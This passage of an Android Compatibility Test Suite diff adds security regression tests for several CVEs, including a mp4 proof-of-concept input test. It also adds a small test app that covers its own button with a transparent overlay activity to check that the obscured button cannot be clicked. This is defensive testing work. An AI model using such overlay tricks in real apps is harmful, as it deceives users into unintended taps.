private HostsideMainlineModuleDetector mainlineModuleDetector = new HostsideMainlineModuleDetector(this);
@Rule public TestName testName = new TestName();
@@ -69,6 +69,11 @@
private static Map<ITestDevice, String> sTestName = new HashMap<>();
private static Map<ITestDevice, PocPusher> sPocPusher = new HashMap<>();
+ @Option(name = "set-kptr_restrict",
+ description = "If kptr_restrict should be set to 2 after every reboot")
+ private boolean setKptr_restrict = false;
+ private boolean ignoreKernelAddress = false;
+
/**
* Waits for device to be online, marks the most recent boottime of the device
*/
@@ -80,13 +85,23 @@
// TODO:(badash@): Watch for other things to track.
// Specifically time when app framework starts
- oomCatcher.start();
sBuildInfo.put(getDevice(), getBuild());
sAbi.put(getDevice(), getAbi());
sTestName.put(getDevice(), testName.getMethodName());
pocPusher.setDevice(getDevice()).setBuild(getBuild()).setAbi(getAbi());
sPocPusher.put(getDevice(), pocPusher);
+
+ if (setKptr_restrict) {
+ if (getDevice().enableAdbRoot()) {
+ CLog.i("setting kptr_restrict to 2");
+ getDevice().executeShellCommand("echo 2 > /proc/sys/kernel/kptr_restrict");
+ getDevice().disableAdbRoot();
+ } else {
+ // not a rootable device
+ ignoreKernelAddress = true;
+ }
+ }
}
/**
@@ -95,8 +110,6 @@
*/
@After
public void tearDown() throws Exception {
- oomCatcher.stop(getDevice().getSerialNumber());
-
try {
getDevice().waitForDeviceAvailable(90 * 1000);
} catch (DeviceNotAvailableException e) {
@@ -105,27 +118,11 @@
getDevice().waitForDeviceAvailable(30 * 1000);
}
- if (oomCatcher.isOomDetected()) {
- // we don't need to check kernel start time if we intentionally rebooted because oom
- updateKernelStartTime();
- switch (oomCatcher.getOomBehavior()) {
- case FAIL_AND_LOG:
- fail("The device ran out of memory.");
- break;
- case PASS_AND_LOG:
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
- break;
- case FAIL_NO_LOG:
- fail();
- break;
- }
- } else {
- long deviceTime = getDeviceUptime() + kernelStartTime;
- long hostTime = System.currentTimeMillis() / 1000;
- assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2);
+ long deviceTime = getDeviceUptime() + kernelStartTime;
+ long hostTime = System.currentTimeMillis() / 1000;
+ assertTrue("Phone has had a hard reset", (hostTime - deviceTime) < 2);
- // TODO(badash@): add ability to catch runtime restart
- }
+ // TODO(badash@): add ability to catch runtime restart
}
public static IBuildInfo getBuildInfo(ITestDevice device) {
@@ -180,6 +177,7 @@
*/
public void assertNotKernelPointer(Callable<String> getPtrFunction, ITestDevice deviceToReboot)
throws Exception {
+ assumeFalse("Cannot set kptr_restrict to 2, ignoring kptr test.", ignoreKernelAddress);
String ptr = null;
for (int i = 0; i < 4; i++) { // ~0.4% chance of false positive
ptr = getPtrFunction.call();
@@ -231,7 +229,22 @@
* Check if a driver is present on a machine.
*/
protected boolean containsDriver(ITestDevice device, String driver) throws Exception {
- boolean containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0;
+ boolean containsDriver = false;
+ if (driver.contains("*")) {
+ // -A list all files but . and ..
+ // -d directory, not contents
+ // -1 list one file per line
+ // -f unsorted
+ String ls = "ls -A -d -1 -f " + driver;
+ if (AdbUtils.runCommandGetExitCode(ls, device) == 0) {
+ String[] expanded = device.executeShellCommand(ls).split("\\R");
+ for (String expandedDriver : expanded) {
+ containsDriver |= containsDriver(device, expandedDriver);
+ }
+ }
+ } else {
+ containsDriver = AdbUtils.runCommandGetExitCode("test -r " + driver, device) == 0;
+ }
MetricsReportLog reportLog = buildMetricsReportLog(getDevice());
reportLog.addValue("path", driver, ResultType.NEUTRAL, ResultUnit.NONE);
@@ -267,7 +280,15 @@
}
private long getDeviceUptime() throws DeviceNotAvailableException {
- String uptime = getDevice().executeShellCommand("cat /proc/uptime");
+ String uptime = null;
+ int attempts = 5;
+ do {
+ if (attempts-- <= 0) {
+ throw new RuntimeException("could not get device uptime");
+ }
+ getDevice().waitForDeviceAvailable();
+ uptime = getDevice().executeShellCommand("cat /proc/uptime").trim();
+ } while (uptime.isEmpty());
return Long.parseLong(uptime.substring(0, uptime.indexOf('.')));
}
@@ -285,10 +306,6 @@
kernelStartTime = (System.currentTimeMillis() / 1000) - uptime;
}
- public HostsideOomCatcher getOomCatcher() {
- return oomCatcher;
- }
-
/**
* Return true if a module is play managed.
*
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
index 80fcf24..c596244 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/TestMedia.java
@@ -46,6 +46,19 @@
******************************************************************************/
/**
+ * b/17769851
+ * Vulnerability Behaviour: EXIT_VULNERABLE (113)
+ */
+ @SecurityTest(minPatchLevel = "2015-12")
+ @Test
+ public void testPocCVE_2015_6616() throws Exception {
+ pocPusher.only64();
+ String inputFiles[] = {"cve_2015_6616.mp4"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2015-6616",
+ AdbUtils.TMP_PATH + inputFiles[0], inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+
+ /**
* b/37239013
* Vulnerability Behaviour: EXIT_VULNERABLE (113)
*/
@@ -98,6 +111,7 @@
@SecurityTest(minPatchLevel = "2020-11")
@Test
public void testPocCVE_2020_0450() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0450", null, getDevice());
}
@@ -153,6 +167,7 @@
@SecurityTest(minPatchLevel = "2019-08")
@Test
public void testPocCVE_2019_2133() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2133", null, getDevice());
}
@@ -163,6 +178,7 @@
@SecurityTest(minPatchLevel = "2019-08")
@Test
public void testPocCVE_2019_2134() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2019-2134", null, getDevice());
}
@@ -515,7 +531,11 @@
String binaryName = "CVE-2018-9537";
String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
- testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ // example of check crash to skip:
+ // Abort message: 'frameworks/av/media/extractors/mkv/MatroskaExtractor.cpp:548 CHECK(mCluster) failed.'
+ testConfig.config = new CrashUtils.Config()
+ .setProcessPatterns(binaryName)
+ .appendAbortMessageExcludes("CHECK\\(.*?\\)");
testConfig.config.setSignals(signals);
AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp
new file mode 100644
index 0000000..7001533
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/Android.bp
@@ -0,0 +1,31 @@
+// Copyright (C) 2021 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+android_test_helper_app {
+ name: "CVE-2021-0305",
+ defaults: ["cts_support_defaults"],
+ srcs: ["src/**/*.java"],
+ test_suites: [
+ "cts",
+ "vts10",
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ "androidx.test.core",
+ ],
+ sdk_version: "current",
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
new file mode 100644
index 0000000..07131a6
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/AndroidManifest.xml
@@ -0,0 +1,51 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ xmlns:tools="http://schemas.android.com/tools"
+ package="android.security.cts.CVE_2021_0305"
+ android:targetSandboxVersion="2">
+
+ <uses-permission android:name="android.permission.CAMERA" />
+ <uses-permission android:name="android.permission.RECORD_AUDIO" />
+
+ <application>
+ <uses-library android:name="android.test.runner" />
+ <activity
+ android:name=".MainActivity"
+ android:label="ST (Permission)"
+ android:taskAffinity="android.security.cts.CVE_2021_0305.MainActivity"
+ android:exported="true">
+
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <activity
+ android:name=".OverlayActivity"
+ android:theme="@style/OverlayTheme"
+ android:exported="true"/>
+
+ </application>
+
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2021_0305" />
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml
new file mode 100644
index 0000000..20a9812
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/layout/activity_main.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+ android:orientation="vertical"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ xmlns:tools="http://schemas.android.com/tools"
+ xmlns:app="http://schemas.android.com/apk/res-auto"
+ tools:context=".MainActivity">
+
+ <TextView
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/sample_text"
+ />
+
+ <Button
+ android:id="@+id/testButton1"
+ android:layout_width="wrap_content"
+ android:layout_height="wrap_content"
+ android:text="@string/test_button_label"
+ android:layout_centerInParent="true"
+ android:gravity="end|center_vertical"
+ />
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml
new file mode 100644
index 0000000..815602c
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/resources.xml
@@ -0,0 +1,28 @@
+<resources>
+
+ <attr name="colorOverlay" format="color" />
+ <attr name="colorDialog" format="color" />
+ <attr name="projectAlpha" format="float" />
+
+ <!-- Switch between the two to see what's happening behind the attacks -->
+ <style name="AppTheme" parent="SeeBehind"/>
+ <!--<style name="AppTheme" parent="AppThemeBase.SeeBehind"/>-->
+
+ <style name="SeeBehind">
+ <item name="colorOverlay">#BB4BEFD7</item>
+ <item name="colorDialog">#88FFFFFF</item>
+ <item name="projectAlpha">0.0</item>
+ </style>
+
+ <color name="colorM">#5600D1</color>
+
+ <style name="OverlayTheme" parent="AppTheme">
+ <!--<item name="android:windowBackground">@color/colorM</item>-->
+ <item name="android:windowBackground">@android:color/transparent</item>
+ <item name="android:windowAnimationStyle">@null</item>
+ <item name="android:windowIsTranslucent">true</item>
+ </style>
+
+
+
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml
new file mode 100644
index 0000000..ab8b450
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/res/values/strings.xml
@@ -0,0 +1,5 @@
+<resources>
+ <string name="app_name">CVE_2021_0305</string>
+ <string name="test_button_label">Test Button</string>
+ <string name="sample_text">text in activity</string>
+</resources>
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java
new file mode 100644
index 0000000..5634f4f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/DeviceTest.java
@@ -0,0 +1,142 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0305;
+
+import org.junit.Before;
+import org.junit.After;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.SystemClock;
+import android.util.Log;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import androidx.test.filters.SdkSuppress;
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+import androidx.test.uiautomator.BySelector;
+
+import static org.hamcrest.CoreMatchers.equalTo;
+import static org.hamcrest.CoreMatchers.is;
+import static org.hamcrest.CoreMatchers.notNullValue;
+import static org.junit.Assert.assertThat;
+import static org.junit.Assert.assertFalse;
+
+/**
+ * Basic sample for unbundled UiAutomator.
+ */
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ private static final String BASIC_SAMPLE_PACKAGE
+ = "android.security.cts.CVE_2021_0305";
+ private static final int LAUNCH_TIMEOUT_MS = 20000;
+ private static final String STRING_TO_BE_TYPED = "UiAutomator";
+
+ private UiDevice mDevice;
+
+ @Before
+ public void startMainActivityFromHomeScreen() {
+
+ Log.d("CVE", "startMainActivityFromHomeScreen()");
+
+ // Initialize UiDevice instance
+ mDevice = UiDevice.getInstance(getInstrumentation());
+
+ // Start from the home screen
+ mDevice.pressHome();
+
+ // Launch the blueprint app
+ Context context = getApplicationContext();
+ assertThat(context, notNullValue());
+ PackageManager packageManager = context.getPackageManager();
+ assertThat(packageManager, notNullValue());
+ final Intent intent = packageManager.getLaunchIntentForPackage(BASIC_SAMPLE_PACKAGE);
+ assertThat(intent, notNullValue());
+
+ intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK); // Clear out any previous instances
+ context.startActivity(intent);
+
+ // Wait for the app to appear
+ Log.d("CVE", "wait for the app to appear");
+ mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+ Log.d("CVE", "app appeared");
+ }
+
+ @After
+ public void lastOperation(){
+ Log.d("CVE", "lastOperation() wait 20s");
+ SystemClock.sleep(20000);
+ Log.d("CVE", "lastOperation() completed");
+ }
+
+ @Test
+ public void testClick() {
+ Log.d("CVE", "testClick()");
+ boolean clicked = false;
+ java.util.List<UiObject2> objects;
+ BySelector selector = By.clickable(true);
+ String button;
+
+ //Detect "Test Button".
+ //"Test Button" appears after onResume().
+ //mDevice.wait(Until.hasObject(By.pkg(BASIC_SAMPLE_PACKAGE).depth(0)), LAUNCH_TIMEOUT_MS);
+ //waits for onEnterAnimationComplete() to finish.
+ //So we have LAUNCH_TIMEOUT_MS for the button to appear.
+ //If the button it still not available then
+ //we assume the button is obscured and the test passes.
+ Log.d("CVE", "looking for clickable");
+ objects = mDevice.findObjects(selector);
+ for (UiObject2 o : objects) {
+ button = o.getText();
+ Log.d("CVE", "button:" + button);
+
+ if(button==null){
+ //check the next button
+ continue;
+ }
+
+ switch(button){
+ case "Test Button" :
+ o.click();
+ clicked=true;
+ Log.i("CVE", "clicked: Test Button");
+ break;
+ default :
+ //check the next button
+ continue;
+ }
+
+ //A button this test is looking for just got pressed.
+ //Ignore remaining buttons
+ break;
+ }
+
+ Log.d("CVE", "testClick() end");
+ assertFalse(clicked);
+ Log.d("CVE", "testClick() passed");
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java
new file mode 100644
index 0000000..50a1622
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0305;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.Manifest.permission;
+import android.os.Bundle;
+import android.os.Handler;
+import android.view.View;
+import android.widget.EditText;
+import android.widget.TextView;
+import android.util.Log;
+import android.widget.Button;
+import android.os.SystemClock;
+import static android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION;
+
+
+public class MainActivity extends Activity {
+
+ private static final int REQUEST_CAMERA_PERMISSION = 0;
+ Button testButton1;
+
+ @Override
+ public void onCreate(Bundle b) {
+ super.onCreate(b);
+ Log.e("CVE", "onCreate");
+ setContentView(R.layout.activity_main);
+ testButton1 = (Button) findViewById(R.id.testButton1);//get id of button
+
+ testButton1.setOnClickListener(new View.OnClickListener() {
+ @Override
+ public void onClick(View view) {
+ Log.d("CVE", "button click received");
+ }
+ });
+ }
+
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ Log.d("CVE", "MainActivity.onEnterAnimationComplete()");
+
+ //open OverlayActivity to obstruct MainActivity
+ Intent intent = new Intent(this, OverlayActivity.class);
+ intent.setFlags(FLAG_ACTIVITY_NO_ANIMATION);
+ startActivity(intent);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java
new file mode 100644
index 0000000..c320e5a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java
@@ -0,0 +1,4 @@
+package android.security.cts.CVE_2021_0305;
+import android.app.Activity;
+
+public class OverlayActivity extends Activity {}
diff --git a/tests/app/app/src/android/app/stubs/LocalForegroundService.java b/tests/app/app/src/android/app/stubs/LocalForegroundService.java
index 3051a18..0c096c9 100644
--- a/tests/app/app/src/android/app/stubs/LocalForegroundService.java
+++ b/tests/app/app/src/android/app/stubs/LocalForegroundService.java
@@ -31,8 +31,8 @@
public class LocalForegroundService extends LocalService {
private static final String TAG = "LocalForegroundService";
- protected static final String EXTRA_COMMAND = "LocalForegroundService.command";
- private static final String NOTIFICATION_CHANNEL_ID = "cts/" + TAG;
+ public static final String EXTRA_COMMAND = "LocalForegroundService.command";
+ public static final String NOTIFICATION_CHANNEL_ID = "cts/" + TAG;
public static String ACTION_START_FGS_RESULT =
"android.app.stubs.LocalForegroundService.RESULT";
diff --git a/tests/app/src/android/app/cts/ActivityManagerApi29Test.java b/tests/app/src/android/app/cts/ActivityManagerApi29Test.java
index 28611c5..489ea95 100644
--- a/tests/app/src/android/app/cts/ActivityManagerApi29Test.java
+++ b/tests/app/src/android/app/cts/ActivityManagerApi29Test.java
@@ -44,6 +44,7 @@
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager.NameNotFoundException;
+import android.os.SystemClock;
import android.permission.cts.PermissionUtils;
import android.provider.DeviceConfig;
import android.provider.Settings;
@@ -201,6 +202,8 @@
*/
@Test
public void testFgsLocationWithAppOps() throws Exception {
+ // Sleep 12 seconds to let BAL grace period expire.
+ SystemClock.sleep(12000);
// Start a foreground service with location
startSimpleService();
// Wait for state and capability change.
diff --git a/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java b/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java
index c982cd6..09166c3 100644
--- a/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java
+++ b/tests/app/src/android/app/cts/ActivityManagerFgsBgStartTest.java
@@ -28,6 +28,7 @@
import android.content.pm.ApplicationInfo;
import android.content.pm.ServiceInfo;
import android.os.Bundle;
+import android.os.SystemClock;
import android.test.InstrumentationTestCase;
public class ActivityManagerFgsBgStartTest extends InstrumentationTestCase {
@@ -128,7 +129,8 @@
CommandReceiver.sendCommand(mContext,
CommandReceiver.COMMAND_STOP_ACTIVITY,
PACKAGE_NAME_APP1, PACKAGE_NAME_APP1, 0, null);
-
+ // Sleep 12 second to let BAL grace period expire.
+ SystemClock.sleep(12000);
uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE,
WatchUidRunner.STATE_CACHED_EMPTY,
new Integer(PROCESS_CAPABILITY_NONE));
@@ -183,7 +185,8 @@
uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE,
WatchUidRunner.STATE_TOP,
new Integer(PROCESS_CAPABILITY_ALL));
-
+ // Sleep 12 second to let BAL grace period expire.
+ SystemClock.sleep(12000);
// From package1, start FGSL in package2.
CommandReceiver.sendCommand(mContext,
CommandReceiver.COMMAND_START_FOREGROUND_SERVICE_LOCATION,
@@ -204,7 +207,8 @@
CommandReceiver.sendCommand(mContext,
CommandReceiver.COMMAND_STOP_ACTIVITY,
PACKAGE_NAME_APP1, PACKAGE_NAME_APP1, 0, null);
-
+ // Sleep 12 second to let BAL grace period expire.
+ SystemClock.sleep(12000);
uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE,
WatchUidRunner.STATE_CACHED_EMPTY,
new Integer(PROCESS_CAPABILITY_NONE));
@@ -287,6 +291,8 @@
uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE,
WatchUidRunner.STATE_TOP,
new Integer(PROCESS_CAPABILITY_ALL));
+ // Sleep 12 second to let BAL grace period expire.
+ SystemClock.sleep(12000);
CommandReceiver.sendCommand(mContext,
CommandReceiver.COMMAND_CREATE_FGSL_PENDING_INTENT,
PACKAGE_NAME_APP1, PACKAGE_NAME_APP2, 0, null);
@@ -318,7 +324,8 @@
CommandReceiver.sendCommand(mContext,
CommandReceiver.COMMAND_STOP_ACTIVITY,
PACKAGE_NAME_APP1, PACKAGE_NAME_APP1, 0, null);
-
+ // Sleep 12 second to let BAL grace period expire.
+ SystemClock.sleep(12000);
uid1Watcher.waitFor(WatchUidRunner.CMD_PROCSTATE,
WatchUidRunner.STATE_CACHED_EMPTY,
new Integer(PROCESS_CAPABILITY_NONE));
diff --git a/tests/app/src/android/app/cts/ApplicationTest.java b/tests/app/src/android/app/cts/ApplicationTest.java
index 4b0fc78..548a37f 100644
--- a/tests/app/src/android/app/cts/ApplicationTest.java
+++ b/tests/app/src/android/app/cts/ApplicationTest.java
@@ -37,8 +37,8 @@
*/
public class ApplicationTest extends InstrumentationTestCase {
private static final String ERASE_FONT_SCALE_CMD = "settings delete system font_scale";
- // 2 is an arbitrary value.
- private static final String PUT_FONT_SCALE_CMD = "settings put system font_scale 2";
+ // 1.2 is an arbitrary value.
+ private static final String PUT_FONT_SCALE_CMD = "settings put system font_scale 1.2";
@Override
public void tearDown() throws Exception {
diff --git a/tests/app/src/android/app/cts/ServiceTest.java b/tests/app/src/android/app/cts/ServiceTest.java
index 792ef5d..d2e0776 100644
--- a/tests/app/src/android/app/cts/ServiceTest.java
+++ b/tests/app/src/android/app/cts/ServiceTest.java
@@ -1105,6 +1105,31 @@
assertNoNotification(2);
}
+ public void testForegroundService_notificationChannelDeletion() throws Exception {
+ NotificationManager noMan = mContext.getSystemService(NotificationManager.class);
+
+ // Start service as foreground - it should show notification #1
+ mExpectedServiceState = STATE_START_1;
+ startForegroundService(LocalForegroundService.COMMAND_START_FOREGROUND);
+ waitForResultOrThrow(DELAY, "service to start first time");
+ assertNotification(1, LocalForegroundService.getNotificationTitle(1));
+
+ try {
+ final String channel = LocalForegroundService.NOTIFICATION_CHANNEL_ID;
+ noMan.deleteNotificationChannel(channel);
+ fail("Deleting FGS notification channel did not throw");
+ } catch (SecurityException se) {
+ // Expected outcome, i.e. success case
+ } catch (Exception e) {
+ fail("Deleting FGS notification threw unexpected failure " + e);
+ }
+
+ mExpectedServiceState = STATE_DESTROY;
+ mContext.stopService(mLocalForegroundService);
+ waitForResultOrThrow(DELAY, "service to be destroyed");
+
+ }
+
class TestSendCallback implements PendingIntent.OnFinished {
public volatile int result = -1;
diff --git a/tests/framework/base/windowmanager/Android.mk b/tests/framework/base/windowmanager/Android.mk
index ef6a95e..39d0812 100644
--- a/tests/framework/base/windowmanager/Android.mk
+++ b/tests/framework/base/windowmanager/Android.mk
@@ -44,7 +44,7 @@
CtsMockInputMethodLib \
metrics-helper-lib \
-LOCAL_COMPATIBILITY_SUITE := cts vts10 general-tests
+LOCAL_COMPATIBILITY_SUITE := cts vts10 general-tests sts
LOCAL_SDK_VERSION := test_current
diff --git a/tests/framework/base/windowmanager/alertwindowapp/Android.bp b/tests/framework/base/windowmanager/alertwindowapp/Android.bp
index 07069de..c8245da 100644
--- a/tests/framework/base/windowmanager/alertwindowapp/Android.bp
+++ b/tests/framework/base/windowmanager/alertwindowapp/Android.bp
@@ -29,5 +29,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp b/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp
index e7cbcdb..fd6d943 100644
--- a/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp
+++ b/tests/framework/base/windowmanager/alertwindowappsdk25/Android.bp
@@ -31,5 +31,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/alertwindowservice/Android.bp b/tests/framework/base/windowmanager/alertwindowservice/Android.bp
index 58d8688..6aee4e4 100644
--- a/tests/framework/base/windowmanager/alertwindowservice/Android.bp
+++ b/tests/framework/base/windowmanager/alertwindowservice/Android.bp
@@ -27,6 +27,7 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
dex_preopt: {
diff --git a/tests/framework/base/windowmanager/app/Android.bp b/tests/framework/base/windowmanager/app/Android.bp
index b12f93b..3512924 100644
--- a/tests/framework/base/windowmanager/app/Android.bp
+++ b/tests/framework/base/windowmanager/app/Android.bp
@@ -33,5 +33,6 @@
"cts",
"vts10",
"general-tests",
+ "sts",
],
}
diff --git a/tests/framework/base/windowmanager/app/AndroidManifest.xml b/tests/framework/base/windowmanager/app/AndroidManifest.xml
index e17658a..fd55b69 100755
--- a/tests/framework/base/windowmanager/app/AndroidManifest.xml
+++ b/tests/framework/base/windowmanager/app/AndroidManifest.xml
@@ -172,6 +172,15 @@
android:minHeight="80dp"
/>
</activity>
+ <activity android:name=".PipActivityWithTinyMinimalSize"
+ android:resizeableActivity="false"
+ android:supportsPictureInPicture="true"
+ android:configChanges="orientation|screenSize|smallestScreenSize|screenLayout"
+ android:exported="true"
+ android:taskAffinity="nobody.but.PipActivity">
+ <layout android:minWidth="1dp"
+ android:minHeight="1dp"/>
+ </activity>
<activity android:name=".FreeformActivity"
android:resizeableActivity="true"
android:taskAffinity="nobody.but.FreeformActivity"
diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
index 108e034..97457be 100644
--- a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
+++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
@@ -79,6 +79,8 @@
public static final ComponentName PIP_ACTIVITY2 = component("PipActivity2");
public static final ComponentName PIP_ACTIVITY_WITH_MINIMAL_SIZE = component(
"PipActivityWithMinimalSize");
+ public static final ComponentName PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE = component(
+ "PipActivityWithTinyMinimalSize");
public static final ComponentName PIP_ACTIVITY_WITH_SAME_AFFINITY =
component("PipActivityWithSameAffinity");
public static final ComponentName PIP_ON_STOP_ACTIVITY = component("PipOnStopActivity");
diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java
new file mode 100644
index 0000000..cd1c625
--- /dev/null
+++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java
